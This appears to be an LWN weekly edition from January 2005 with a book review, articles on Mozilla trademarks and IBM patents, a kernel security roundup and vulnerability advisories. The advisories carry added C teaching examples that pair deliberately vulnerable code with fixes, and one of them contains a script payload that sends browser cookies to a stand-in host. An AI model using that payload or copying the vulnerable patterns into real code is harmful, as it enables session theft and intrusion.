Review: Linux Application Development, Second Edition
![[LAD cover]](/images/ns/linux-application-development.jpg)
In the late 1990s, Linux began to attract large-scale attention beyond the
relatively small hacker community which had been working on it for some
time. With all that attention came many new developers who liked what they
saw and wanted to be a part of it. The book that many of those developers
kept next to their keyboard was the classic Linux Application
Development (LAD), by early Red Hat hackers Michael K. Johnson and Erik
W. Troan. LAD was published in 1998, meaning that, at this point, it is
vastly out of date. The Linux world does not stand still, and does not
make life easy for those who would publish technical reference books.
Trust your editor on this.
So it was a pleasant surprise to see a new edition of LAD show up in the
mail. This core text, it turns out, has not gone out of maintenance after
all.
According to the preface:
You can now browse and search the entire content of this book at
http://ladweb.net to make this book even
more useful to you.
As of this writing, the web site has not caught up with that claim - it
still discusses the first edition, and there is no "entire content" to
browse. One assumes that situation will be rectified in time. If the book
is being released under some sort of free license, that is not stated
explicitly.
The structure and content of the book has not changed all that much from
the first edition: LAD still concerns itself with low-level Linux
programming, system calls, and some C libraries. The updates are to be
found in the details: the text now matches, for the most part, the
interfaces provided by the 2.6 kernel and glibc 2.3. Some new interfaces
(such as epoll()) have been covered, and there is a new chapter on
security pitfalls and how to avoid them. The discussion of the socket
interface covers IPv6, the regular expression discussion has been expanded,
real-time signals are covered, etc.
With these changes, LAD is, once again, the definitive reference for the
low-level Linux C API. Whether you need to learn about memory allocation
debugging facilities, the details of process management, file descriptor
magic, or more, you're likely to find what you need in this book. Much of
that information is also available in generic Unix texts; the difference is
that LAD looks at exactly what Linux offers. While Linux follows the
relevant standards to a great degree, there are many places where Linux
diverges from the standards or offers extra capabilities. A reference book
which documents the Linux way of doing things is a good thing.
That said, your editor does have some quibbles with the second edition.
One is that the update appears, in many places, to have been done in a
hurry. The LGPL is called the "Library General Public License" - but it
has not had that name for quite a few years now. The recommended system
administration book is Sobell's A Practical Guide to Red Hat
Linux 8. The (new) documentation
of strace claims that it writes to the standard output, which is
not true (it writes to stderr). Passwords, it claims, are usually stored
in /etc/passwd; on any modern system the hashes live in /etc/shadow.
Many flags to the clone() system call
are missing; a number of mmap() flags are absent as well. Your
editor may have been willing to forgive all of this if the authors, while
being nice enough to mention Linux Device Drivers, had noticed that
a new edition has come out since 1998.
Perhaps more to the point, however, LAD may be falling behind the way that
applications are being developed for Linux. Your editor has certainly done
his time writing ioctl() calls to control TTY parameters - but not
recently. The chapters on virtual consoles and S-Lang seem rather quaint.
While a great deal of Linux software is still developed in C, quite a bit
is not. After reading LAD, one might almost conclude that graphical
applications simply do not exist under Linux. The authors clearly had to
limit their scope, and they cannot be faulted for failing to document, say,
the GNOME and KDE libraries. But the second edition could have been an
ideal vehicle for pointing developers toward the sorts of tools being used
for new code, and away from writing TTY-oriented applications.
That said, application developers still need to understand how to manage
memory, create processes, handle signals, work with files, etc. The second
edition of Linux Application Development fills that need and more;
it is a most welcome update. It will, beyond doubt, find a location very
near the keyboards of a great many Linux application hackers.
Debian and Mozilla - a study in trademarks
The Mozilla Foundation is the keeper of a number of increasingly important
projects, including the Firefox web browser and the Thunderbird mail
client. These programs are free software, licensed under the Mozilla
Public License. Thus, one would think, distributors would have no trouble
including these packages in their distributions. As the Debian Project's
experience shows, however, free software can still come with certain kinds
of strings attached.
The issue at hand is trademarks. Mozilla Foundation software comes with
trademarked names, and the use of those names is governed by the Mozilla
Trademark Policy. If you want to distribute software called "Mozilla
Firefox" or "Mozilla Thunderbird," you must adhere to a
strict policy which includes signing an agreement with the Foundation
and making almost no changes to the software. No extensions may be added,
the list of search engines cannot be changed (they paid to be there, after all), etc. This
highly-restrictive policy was never going to work with the Debian Project's
needs.
Another approach is the "community edition" policy. A wider (but still
narrow) range of
changes is allowed, and the distributor can use the names "Firefox
Community Edition." The commands can be called firefox and
thunderbird. The Foundation maintains a veto right over uses of
the "community edition" names, however:
Community members and organizations can start using the "Firefox
Community Edition" and "Thunderbird Community Edition" trademarks
from day one, but the Mozilla Foundation may require individuals or
teams to stop doing so in the future if they are redistributing
software with low quality and efforts to remedy the situation have
not succeeded.
So anybody distributing a "community edition" must live with the
possibility of receiving a "takedown notice" from the Mozilla Foundation at
any time. The Foundation's goals are certainly understandable:
...we need to keep enough control over our trademarks to make sure
they are a sign of quality and safety. It needs to be impossible,
for example, for someone to release a product called 'Firefox' that
has added spyware. We want to avoid someone building a
highly-optimized but unstable build and passing it off as
official.
Most readers will agree that a spyware-enabled Firefox is a bad idea,
though whether purveyors of spyware will have much respect for trademarks
is an open question.
The Debian Project insists on shipping nothing but free software, and
freedom certainly includes the right to modify the code. Debian currently
includes patches which may go beyond the
trademark policy's guidelines - an extension manager which understands
multi-user systems, for example. A strict reading of the community edition
guidelines suggests that not even security patches could be distributed
without prior approval from the Mozilla Foundation. The Debian Project
certainly wants to be able to distribute modified versions of the code; the
Project is also known for a close and literal reading of licenses. So the
Debian developers are concerned about the whole trademark issue.
The Mozilla Foundation wants to work with
Debian to get past these issues:
We want people to use Thunderbird in Debian, and to know they are
using Thunderbird, and to get the high quality experience people
get from using our Thunderbird. And we want to come to some
arrangement with Debian to make that possible.
This arrangement could possibly include allowing Debian to apply its own
patches to Firefox and Thunderbird and still use the community names. The
Foundation seems to have a fairly high level of trust in Debian's ability
to keep the quality up. Debian's users are another story, however:
However, you guys want the freedom to ship software that sucks -
or, more to the point and more likely, want to be able to easily
give your software to other people and allow them to make it suck
and then ship it. If that software ships using our trademarks, then
that is incompatible with our trademark goals. So if we can't come
to some arrangement that lets Debian use them but asks
redistributors to contact us or remove them, then it's increasingly
looking like we can't square this circle.
So it looks somewhat like the Foundation would like to make a special policy
exemption for Debian. The problem there is that Debian-specific licenses
violate section 8 of the Debian Free
Software Guidelines. Those guidelines apply to software licenses, not
trademark policies, but the principle remains the same. The Debian Project
is unlikely to accept a policy which does not extend to its users.
The discussion has quieted - it may have gone into a non-public
mode - so it is difficult to say where things stand now. If an agreement
cannot be found, Debian will still be able to distribute Firefox and
Thunderbird - they are free software - but different names will have
to be chosen. "Iceweasel" has been the working code name for this scenario;
many other names have been suggested as well. This outcome would not be
pleasing to any of the parties involved, however; one assumes it will be
avoided if at all possible.
Mozilla is unlikely to be the last project that decides that it wants to
achieve some sort of quality control through its trademarks. That wish is
understandable, but it is also very much at odds with the spirit of free
software, which involves letting go of the code. One has to accept that
not everybody will have the same idea of what makes "high quality."
Incidents of free software projects being harmed by distribution of
poorly-done modifications have been rare, and, perhaps, are not worth the
worry that is being put into them here. Mozilla has done an outstanding
job of creating powerful and useful software; now, perhaps, the Foundation
may want to relax and trust its users just a little more.
IBM's patent pledge
On January 11, IBM
announced
that it would make 500 patents available for use in projects using
Open Source Initiative (OSI) approved
licenses.
The list of patents and IBM's pledge is available
as a
PDF. In the statement, IBM pledges not to assert
any of the 500 patents against distributors of open source software, so
long as the distributing party does not file lawsuits using patents or
other intellectual property rights against open source software.
The list of patents ranges from a "Method and apparatus for batching the
receipt of data packets" (U.S. Patent Number 5,260,942) to a "System and
method for ensuring QoS in a token ring network" (5,642,421). Given that
IBM has listed 500 patents, this reporter has not had time to read each
patent, but suffice it to say that the patents cover a wide range of
applications from human language processing to web services and data
processing.
Reaction to IBM's move has been mixed. OSDL's Stuart Cohen is apparently in
support of IBM's pledge, and Larry Lessig was also quoted as saying
that it was "exciting."
Others were not so impressed. Florian Mueller points
out that "We're talking about roughly one percent of IBM's
worldwide patent portfolio. They file that number of patents in about a
month's time." Mueller also called it a "diversionary
tactic," which may be accurate given IBM's support
of the European Patent Directive, which has been denounced
by many of the leading members of the open source community.
There is ample room for skepticism. IBM's move offers up only a small
portion of its patent portfolio for use by open source projects. To put
it another way, IBM is withholding the remainder of its patent portfolio,
without any assurance that open source projects (with the exception of the
Linux kernel) are safe from potential litigation.
We spoke to IBM's manager of worldwide Linux marketing strategy, Adam
Jollans, about the patents. Jollans said that IBM was "seeing a shift
from innovation in commercial companies to cooperative innovation,"
and that the patent pledge was a way to support that.
We asked why IBM picked 500 rather than 50 or 5,000, or simply giving open
source a pass altogether. Jollans said that IBM "has to start
somewhere" and that 500 was a number that would prove it
was a significant announcement. No reason was given for holding back the
majority of IBM's patent portfolio. Jollans did say that IBM's choice of
patents was not random, and that they were picked because they were "500 that
we believe will be useful" to open source.
IBM's move could also be seen as an attempt to take some of the steam out
of the anti-software patent movement in Europe as the EU considers a motion
to start
over with the software patent directive. We also asked why IBM had not
chosen to take a stand against software patents altogether. Jollans said
that IBM supported patents, but that "patents should reflect
innovation rather than just a general idea."
Jollans said that IBM is encouraging other companies to step up and offer
the use of their patents for open source as well. Whether or not any
companies will do so is yet to be seen.
By offering only a small sample of its patent portfolio, IBM is
well-positioned to take offensive action should it ever decide to do so. If
there were an open source project that IBM wanted to quash, there are more
patents where the first 500 came from. IBM has
shown no interest in launching patent attacks against free software, and
the company certainly understands what such an attack would do to its
standing in the community. Even so,
there's no guarantee that IBM will always be so well-intentioned.
Ultimately, IBM's "patent pledge" is a good PR move, but little more. IBM
has little to gain from asserting its patents against open source projects,
and stands to benefit from the continued development of Linux and other
open source projects. By offering a non-aggression pact towards open source
projects, IBM effectively says it's OK to develop programs that might
infringe on (some of) its patents, so long as those programs are available to IBM
under open source terms. That's a far cry from the desired outcome of
barring software patents altogether, but it's still a step in the right
direction.
Page editor: Jonathan Corbet
Security
Linux kernel security
There has been a surprising series of kernel security problems reported
over the last week. These include:
- The uselib() vulnerability disclosed
by Paul Starzetz. A locking mistake in an old and mostly unused
system call creates a race condition which can be exploited to change
protections on memory - and compromise the system. The exploit has
not been released, but Mr. Starzetz claims that the race is relatively
easy to exploit by first consuming large amounts of memory to force
the kernel to sleep in the right spot.
- Paul Starzetz also discovered a race
condition in the page fault handler which can only be exploited on
SMP systems. If two threads try to expand the same downward-growing
memory segment (normally a stack) at the same time, the result can be
an exploitable corruption of the page tables.
- The grsecurity team, frustrated at a seeming lack of interest in
security problems among the kernel developers, disclosed five vulnerabilities at once.
One of these is a denial-of-service problem where users could lock
more than the authorized amount of memory into physical RAM; as it
turns out, the kernel developers still are
not overly concerned about that problem. The other
vulnerabilities require root access (or at least access to physical
devices) to exploit; one of them is in a driver which does not compile
in 2.6.
Fixes for the first two vulnerabilities have been merged into the
pre-2.6.11 BitKeeper repository; the last set will be fixed as well, but
with less urgency. Fixes can also be found in the -ac tree and in the updated kernels being
issued by distributors.
One concern that has been raised by these disclosures is that the new
kernel development model, by encouraging such large changes between
releases, is allowing the creation of more security problems. While that
worry could yet prove to be justified, all of the vulnerabilities listed
above, with the exception of the RLIMIT_MEMLOCK denial of service
problem, are present in the 2.4 kernel as well. They were not introduced
or enabled by the new development model.
Another concern is more valid, however: the kernel development project does
not have an official security contact or process for handling security
problems. Developers who know how the kernel process works have no trouble
getting consideration for security-related problems and patches, but the
whole process looks far more opaque to the rest of the world. There is a
clear need for an easily-found contact for kernel security issues. Chris
Wright, who has done a fair amount of security-related kernel work, is pushing for improvements in this area, and,
most importantly, has volunteered to do much of the work. So chances are
this problem will not last much longer.
New vulnerabilities
bmv: insecure temporary file
| Package(s): | bmv |
| CVE #(s): | CAN-2003-0014 |
| Created: | January 11, 2005 |
| Updated: | January 12, 2005 |
| Description: | Peter Samuelson, upstream maintainer of bmv, a PostScript viewer for SVGAlib, discovered that temporary files are created in an insecure fashion. A malicious local user could cause arbitrary files to be overwritten by a symlink attack. |
dillo: format string vulnerability
| Package(s): | dillo |
| CVE #(s): | CAN-2005-0012 |
| Created: | January 10, 2005 |
| Updated: | January 12, 2005 |
| Description: | Gentoo Linux developer Tavis Ormandy found a format string bug in Dillo's handling of messages in a_Interface_msg(). An attacker could craft a malicious web page which, when accessed using Dillo, would trigger the format string vulnerability and potentially execute arbitrary code with the rights of the user running Dillo. |
exim: buffer overflows
hylafax: weak hostname and username validation
| Package(s): | hylafax |
| CVE #(s): | CAN-2004-1182 |
| Created: | January 11, 2005 |
| Updated: | January 13, 2005 |
| Description: | Patrice Fournier discovered a vulnerability in the authorization subsystem of hylafax, a flexible client/server fax system. A local or remote user guessing the contents of the hosts.hfaxd database could gain unauthorized access to the fax system. Fixed in HylaFAX 4.2.1. |
kdelibs: unsanitized input
| Package(s): | kdelibs |
| CVE #(s): | CAN-2004-1165 |
| Created: | January 10, 2005 |
| Updated: | July 19, 2005 |
| Description: | Thiago Macieira discovered a vulnerability in the kioslave library, which is part of kdelibs, which allows a remote attacker to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded newline before the FTP command. |
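The bug class above, as an added example in C that is not kdelibs code: a minimal percent-decoder, a command builder that splices the decoded path straight into an FTP command line, and the fixed builder that rejects control characters after decoding. The attacker URL path, the helper names and the use of a CWD command are assumptions chosen for the demonstration.

```c
/* Added example (not kdelibs code): why a URL-encoded newline in an ftp://
 * path becomes a second FTP command, and the check that stops it. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Minimal percent-decoder for one URL path component. Returns the decoded
 * length, or -1 if the output buffer is too small. */
static int url_decode(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (const char *p = in; *p; p++) {
        if (o + 1 >= outsz) return -1;
        if (*p == '%' && isxdigit((unsigned char)p[1]) && isxdigit((unsigned char)p[2])) {
            char hex[3] = { p[1], p[2], 0 };
            out[o++] = (char)strtol(hex, NULL, 16);
            p += 2;
        } else {
            out[o++] = *p;
        }
    }
    out[o] = 0;
    return (int)o;
}

/* Vulnerable: decode, then splice straight into the protocol line. A path
 * of "pub%0d%0aDELE%20x" makes the client send CWD *and* DELE. */
static int build_cwd_vulnerable(const char *encoded_path, char *cmd, size_t cmdsz)
{
    char path[256];
    if (url_decode(encoded_path, path, sizeof path) < 0) return -1;
    return snprintf(cmd, cmdsz, "CWD %s\r\n", path);
}

/* Fixed: after decoding, refuse anything that can end or extend a protocol
 * line. FTP commands are single CRLF-terminated lines, so CR, LF and other
 * control characters have no business in a path. Reject; do not "sanitize",
 * since stripping would still let the attacker shape the command. */
static int build_cwd_fixed(const char *encoded_path, char *cmd, size_t cmdsz)
{
    char path[256];
    if (url_decode(encoded_path, path, sizeof path) < 0) return -1;
    for (const char *p = path; *p; p++)
        if ((unsigned char)*p < 0x20 || *p == 0x7f) return -1;
    return snprintf(cmd, cmdsz, "CWD %s\r\n", path);
}

/* How many protocol lines a server would parse out of this buffer. */
static int count_lines(const char *cmd)
{
    int n = 0;
    for (const char *p = strstr(cmd, "\r\n"); p; p = strstr(p + 2, "\r\n")) n++;
    return n;
}

int main(void)
{
    /* constructed attacker-controlled path from an ftp:// URL */
    const char *hostile = "pub%0d%0aDELE%20important.txt";
    char cmd[512];
    if (build_cwd_vulnerable(hostile, cmd, sizeof cmd) > 0)
        printf("vulnerable builder sends %d command line(s):\n%s", count_lines(cmd), cmd);
    if (build_cwd_fixed(hostile, cmd, sizeof cmd) < 0)
        printf("fixed builder: rejected path containing control characters\n");
    return 0;
}
```

The same shape of bug shows up wherever decoded URL data is placed into a line-oriented protocol (SMTP, IMAP, HTTP headers); the check belongs after decoding, at the point where the data becomes protocol text.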
kernel: race condition, privilege escalation
| Package(s): | kernel |
| CVE #(s): | CAN-2004-1235, CAN-2004-1337 |
| Created: | January 10, 2005 |
| Updated: | January 19, 2005 |
| Description: | Paul Starzetz discovered a race condition in the ELF library and a.out binary format loaders, which can be locally exploited in several different ways to gain root privileges (CAN-2004-1235). Liang Bin found a design flaw in the capability module: after this module was loaded on demand in a running system, all unprivileged user space processes got all kernel capabilities, thus essentially root privileges (CAN-2004-1337). |
Konqueror: Java sandbox vulnerabilities
| Package(s): | konqueror |
| CVE #(s): | CAN-2004-1145 |
| Created: | January 11, 2005 |
| Updated: | January 12, 2005 |
| Description: | According to this KDE Security Advisory, two flaws in the Konqueror web browser make it possible to bypass the sandbox environment which is used to run Java applets. All versions of KDE up to KDE 3.3.1 inclusive are affected. KDE 3.3.2 is not affected. |
lintian: insecure temporary directory
| Package(s): | lintian |
| CVE #(s): | CAN-2004-1000 |
| Created: | January 10, 2005 |
| Updated: | January 12, 2005 |
| Description: | Jeroen van Wolffelaar discovered a problem in lintian, the Debian package checker. The program removes the working directory even if it wasn't created at program start, removing an unrelated file or directory a malicious user inserted via a symlink attack. |
mailman: cross-site scripting
| Package(s): | mailman |
| CVE #(s): | CAN-2004-1177 |
| Created: | January 10, 2005 |
| Updated: | March 22, 2005 |
| Description: | Florian Weimer discovered a cross-site scripting vulnerability in mailman's automatically generated error messages. An attacker could craft a URL containing JavaScript (or other content embedded into HTML) which triggered a mailman error page. When an unsuspecting user followed this URL, the malicious content was copied unmodified to the error page and executed in the context of this page. |
namazu2: cross-site scripting vulnerability
| Package(s): | namazu2 |
| CVE #(s): | CAN-2004-1318 |
| Created: | January 6, 2005 |
| Updated: | January 12, 2005 |
| Description: | The namazu2 full text search engine has a cross-site scripting vulnerability that may allow an attacker to inject arbitrarily crafted text into its output by means of specially crafted input. |
nfs-utils: arbitrary code execution
| Package(s): | nfs-utils |
| CVE #(s): | CAN-2004-0946 |
| Created: | January 11, 2005 |
| Updated: | February 27, 2006 |
| Description: | Arjan van de Ven discovered a buffer overflow in rquotad on 64-bit architectures; an improper integer conversion could lead to a buffer overflow. An attacker with access to an NFS share could send a specially crafted request which could then lead to the execution of arbitrary code. |
o3read: buffer overflow during file conversion
| Package(s): | o3read |
| CVE #(s): | CAN-2004-1288 |
| Created: | January 11, 2005 |
| Updated: | January 12, 2005 |
| Description: | Wiktor Kopec discovered that the parse_html function in o3read.c copies any number of bytes into a 1024-byte array without a bounds check. |
phpgroupware: information disclosure vulnerability
| Package(s): | phpgroupware |
| CVE #(s): | |
| Created: | January 6, 2005 |
| Updated: | January 12, 2005 |
| Description: | phpgroupware has multiple vulnerabilities that may be exploited for the purpose of information disclosure or a remote compromise. |
poppassd_pam: unauthorized password changing
| Package(s): | poppassd_pam |
| CVE #(s): | CAN-2005-0002 |
| Created: | January 11, 2005 |
| Updated: | January 12, 2005 |
| Description: | Gentoo Linux developer Marcus Hanwell discovered that poppassd_pam did not check that the old password was valid before changing passwords. Subsequent investigation revealed that poppassd_pam did not call pam_authenticate before calling pam_chauthtok. |
TikiWiki: arbitrary command execution
| Package(s): | TikiWiki |
| CVE #(s): | |
| Created: | January 10, 2005 |
| Updated: | January 31, 2005 |
| Description: | TikiWiki lacks a check on uploaded images in the Wiki edit page. A malicious user could run arbitrary commands on the server by uploading and calling a PHP script. |
UnRTF: Buffer overflow
| Package(s): | unrtf |
| CVE #(s): | |
| Created: | January 11, 2005 |
| Updated: | January 12, 2005 |
| Description: | An unchecked strcat() in unrtf may overflow the bounds of a static buffer. Using a specially crafted file, possibly delivered by e-mail or over the web, an attacker may execute arbitrary code with the permissions of the user running UnRTF. |
vilistextum: buffer overflow vulnerability
| Package(s): | vilistextum |
| CVE #(s): | CAN-2004-1299 |
| Created: | January 6, 2005 |
| Updated: | January 12, 2005 |
| Description: | Vilistextum has a buffer overflow vulnerability that allows an attacker to execute arbitrary code via a maliciously created web page. |
Updated vulnerabilities
a2ps: input validation error
| Package(s): | a2ps |
| CVE #(s): | CAN-2004-1170, CAN-2004-1377 |
| Created: | November 26, 2004 |
| Updated: | December 19, 2005 |
| Description: | The GNU a2ps utility fails to properly sanitize filenames, which can be abused by a malicious user to execute arbitrary commands with the privileges of the user running the vulnerable application. More information at Security Focus. |
cdrecord: failure to drop privilege
| Package(s): | cdrecord |
| CVE #(s): | CAN-2004-0806 |
| Created: | September 8, 2004 |
| Updated: | February 21, 2005 |
| Description: | The cdrecord utility, which is installed setuid on some distributions, fails to drop privilege before running a user-specified program. |
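What "dropping privilege before running a user-specified program" has to look like on Linux, as an added example in C that is not cdrecord's code. It assumes a setuid-root binary on a Linux system with setresuid()/setresgid(): the drop is done in the right order, every call's return value is checked, and the result is verified before anything is exec'd. The function names are my own.

```c
/* Added example, not cdrecord's code: shed privilege before exec'ing a
 * user-supplied program, and verify that the drop actually took. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Drop to uid/gid permanently. Order matters: supplementary groups first
 * (only root may change them), then the gid, then the uid; once the uid is
 * gone nothing else can be changed. Every call is checked: a silently
 * failing setuid() (e.g. the target uid is over RLIMIT_NPROC) is how
 * "dropped" privileges turn out not to be. Returns 0 on success. */
static int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setresgid(gid, gid, gid) != 0)
        return -1;
    if (setresuid(uid, uid, uid) != 0)
        return -1;

    /* Verify. If we can still become root, the saved uid was not cleared
     * and the drop is not permanent: refuse to go on. */
    if (uid != 0 && (setuid(0) == 0 || seteuid(0) == 0))
        return -1;
    uid_t r, e, s;
    gid_t rg, eg, sg;
    if (getresuid(&r, &e, &s) != 0 || getresgid(&rg, &eg, &sg) != 0)
        return -1;
    if (r != uid || e != uid || s != uid || rg != gid || eg != gid || sg != gid)
        return -1;
    return 0;
}

/* The vulnerable pattern: run the user's program with whatever privilege
 * the setuid binary still holds. Shown for contrast, never called here. */
static void run_user_program_vulnerable(const char *prog)
{
    execlp(prog, prog, (char *)NULL);
}

/* The fixed pattern: drop first; if the drop cannot be verified, abort
 * rather than run the program anyway. */
static int run_user_program_fixed(const char *prog)
{
    if (drop_privileges(getuid(), getgid()) != 0) {
        fprintf(stderr, "refusing to run %s: could not drop privileges\n", prog);
        return -1;
    }
    execlp(prog, prog, (char *)NULL);
    return -1;   /* only reached if exec itself failed */
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s program\n", argv[0]);
        return 2;
    }
    (void)run_user_program_vulnerable;   /* reference only; see comment above */
    return run_user_program_fixed(argv[1]) == 0 ? 0 : 1;
}
```

Run as an ordinary user the drop is a no-op that still passes verification; installed setuid root it lands the child at the caller's real uid/gid with no saved root uid to fall back on. Helpers that cannot use setresuid() should at least check setuid() and then confirm with getresuid() or, where that is unavailable, by testing that setuid(0) now fails.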
cups: multiple vulnerabilities
| Package(s): | cups |
| CVE #(s): | CAN-2004-1267, CAN-2004-1268, CAN-2004-1269, CAN-2004-1270 |
| Created: | December 17, 2004 |
| Updated: | February 9, 2005 |
| Description: | cups has a denial of service vulnerability in the lppasswd utility and a remote code execution vulnerability in the hpgltops filter. |
cyrus-sasl: remote buffer overflow
| Package(s): | cyrus-sasl |
| CVE #(s): | CAN-2004-0884 |
| Created: | October 7, 2004 |
| Updated: | March 16, 2005 |
| Description: | cyrus-sasl has a vulnerability involving a buffer overflow in the digestmd5.c file. A remote attacker may be able to compromise the system. Also, a local user may be able to exploit a vulnerability by using the SASL_PATH environment variable. |
debmake: insecure temp directories
| Package(s): | debmake |
| CVE #(s): | CAN-2004-1179 |
| Created: | December 23, 2004 |
| Updated: | January 4, 2005 |
| Description: | debmake contains a script that can make insecure temporary directories. This can be used by a symlink attack to create and overwrite arbitrary files. |
dhcp: format string vulnerability
| Package(s): | dhcp |
| CVE #(s): | CAN-2004-1006 |
| Created: | November 4, 2004 |
| Updated: | July 13, 2005 |
| Description: | Dhcp has a format string vulnerability in the log functions of dhcp 2.x that may be exploited via a malicious DNS server. |
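The format string bug class behind this entry and the Dillo entry above, as an added example in C that is not code from either project: the same attacker-supplied string is run through a message routine that uses it as the format and through one that passes it under a constant "%s". The sample input uses only %% so the vulnerable path stays well defined in a demonstration; the function names and the logging wrapper are assumptions.

```c
/* Added example (not Dillo's or dhcp's code): one attacker string, two
 * message routines. Only "%%" is used here so the vulnerable call is well
 * defined; a real attacker sends "%x" to read the stack and "%n" to write
 * to memory through exactly the same path. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Generic logging wrapper. The va_list indirection is what lets this bug
 * hide from the compiler: -Wformat-security only flags printf-family calls
 * with a non-literal format and no arguments, not wrappers like this. */
static void vmsg(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
}

/* Vulnerable: the untrusted text *is* the format. */
static void msg_vulnerable(char *out, size_t outsz, const char *untrusted)
{
    vmsg(out, outsz, untrusted);
}

/* Fixed: a constant format; untrusted data only ever fills a %s. */
static void msg_fixed(char *out, size_t outsz, const char *untrusted)
{
    vmsg(out, outsz, "%s", untrusted);
}

/* Audit helper: how many conversion directives a string carries. Any
 * nonzero count on data that reaches a format argument is a finding;
 * "%%" counts because it proves the string is interpreted, not copied. */
static int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s == '%') {
            n++;
            if (s[1] == '%') s++;   /* "%%" is a single directive */
        }
    }
    return n;
}

int main(void)
{
    char out[64];
    const char *hostile = "100%% done %%x";   /* constructed sample input */

    msg_vulnerable(out, sizeof out, hostile);
    printf("vulnerable: [%s]  (%% pairs consumed: the string was interpreted)\n", out);

    msg_fixed(out, sizeof out, hostile);
    printf("fixed:      [%s]  (copied verbatim)\n", out);

    printf("directives in input: %d\n", count_directives(hostile));
    return 0;
}
```

Auditing for this is mechanical: every printf-, syslog- and vsnprintf-family call whose format argument is not a string literal is suspect, and the wrapper case above is the one that -Wformat-security misses.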
ethereal: multiple vulnerabilities
| Package(s): | ethereal |
| CVE #(s): | CAN-2004-1139, CAN-2004-1140, CAN-2004-1141, CAN-2004-1142 |
| Created: | December 20, 2004 |
| Updated: | January 13, 2005 |
| Description: | There are multiple vulnerabilities in versions of Ethereal earlier than 0.10.8: a bug in DICOM dissection discovered by Bing could make Ethereal crash (CAN-2004-1139); an invalid RTP timestamp could make Ethereal hang and create a large temporary file (CAN-2004-1140); the HTTP dissector could access previously-freed memory (CAN-2004-1141); Brian Caswell discovered that an improperly formatted SMB packet could make Ethereal hang (CAN-2004-1142). |
Filename disclosure vulnerability in fam
| Package(s): | fam |
| CVE #(s): | CAN-2002-0875 |
| Created: | August 19, 2002 |
| Updated: | January 5, 2005 |
| Description: | "fam" (file alteration monitor) watches files and directories for changes and lets interested applications know when something happens. This package has a flaw in its group handling that blocks some legitimate operations while, at the same time, exposing the names of files that should otherwise be invisible. |
Foomatic: Arbitrary command execution in foomatic-rip
| Package(s): | foomatic |
| CVE #(s): | CAN-2004-0801 |
| Created: | September 20, 2004 |
| Updated: | May 31, 2006 |
| Description: | There is a vulnerability in the foomatic-filters package, due to insufficient checking of command-line parameters and environment variables in the foomatic-rip filter. It may allow both local and remote attackers to execute arbitrary commands on the print server with the permissions of the spooler. |
FreeRADIUS: denial of service
| Package(s): | freeradius |
| CVE #(s): | CAN-2004-0938, CAN-2004-0960, CAN-2004-0961 |
| Created: | September 22, 2004 |
| Updated: | February 2, 2005 |
| Description: | FreeRADIUS (through version 1.0.1) suffers from several denial of service vulnerabilities in its packet reception code. |
gaim: buffer overflow in MSN protocol
| Package(s): | gaim |
| CVE #(s): | CAN-2004-0891 |
| Created: | October 25, 2004 |
| Updated: | February 11, 2005 |
| Description: | A buffer overflow in the MSN protocol handler for gaim 0.79 to 1.0.1 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via an "unexpected sequence of MSNSLP messages" that results in an unbounded copy operation that writes to the wrong buffer. |
Gallery: cross-site scripting vulnerability
| Package(s): | Gallery |
| CVE #(s): | CAN-2004-1106 |
| Created: | November 8, 2004 |
| Updated: | January 17, 2005 |
| Description: | Jim Paris has discovered a cross-site scripting vulnerability in Gallery. By sending a carefully crafted URL, an attacker can inject and execute script code in the victim's browser window, and potentially compromise the user's gallery. |
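The reflected cross-site scripting pattern behind this entry, the mailman entry and the namazu2 entry, as an added example in C that is none of those projects' code: an error page that reflects part of the request, built first without escaping and then through an output-encoding helper. The list-name parameter, the page markup and the helper names are constructed for the demonstration.

```c
/* Added example (not mailman's, Gallery's or namazu2's code): a reflected
 * request parameter in an error page, the vulnerable way and the fixed way. */
#include <stdio.h>
#include <string.h>

/* Escape the five characters that let text break out of an HTML text node
 * or a quoted attribute value. Returns bytes written (excluding the NUL),
 * or -1 if the output buffer is too small; on -1 the output is unusable. */
static int html_escape(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (; *in; in++) {
        const char *rep;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = NULL;     break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (o + n >= outsz) return -1;
        if (rep) memcpy(out + o, rep, n); else out[o] = *in;
        o += n;
    }
    out[o] = 0;
    return (int)o;
}

/* Vulnerable: the name taken from the URL goes into the page unmodified,
 * which is exactly what the mailman advisory describes. */
static int error_page_vulnerable(const char *listname, char *page, size_t pagesz)
{
    return snprintf(page, pagesz, "<h1>No such list <em>%s</em></h1>", listname);
}

/* Fixed: escape where the data becomes HTML (output encoding), not at input
 * time, so the same string is safe in every page it is ever written into. */
static int error_page_fixed(const char *listname, char *page, size_t pagesz)
{
    char safe[1024];
    if (html_escape(listname, safe, sizeof safe) < 0) return -1;
    return snprintf(page, pagesz, "<h1>No such list <em>%s</em></h1>", safe);
}

int main(void)
{
    /* constructed attacker-supplied list name, as it would arrive in a URL */
    const char *hostile =
        "<script>document.location='http://evil.example/?'+document.cookie</script>";
    char page[2048];

    error_page_vulnerable(hostile, page, sizeof page);
    printf("vulnerable: %s\n", page);

    error_page_fixed(hostile, page, sizeof page);
    printf("fixed:      %s\n", page);
    return 0;
}
```

Escaping at output time is the important design point: an "input filter" that strips <script> on the way in still leaves the data unsafe for every other context (attribute values, JavaScript strings, URLs), and a later code path that builds a page from the stored value inherits the bug.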
gtk2, gdk-pixbuf: buffer overflows
| Package(s): | gdk-pixbuf gtk2 |
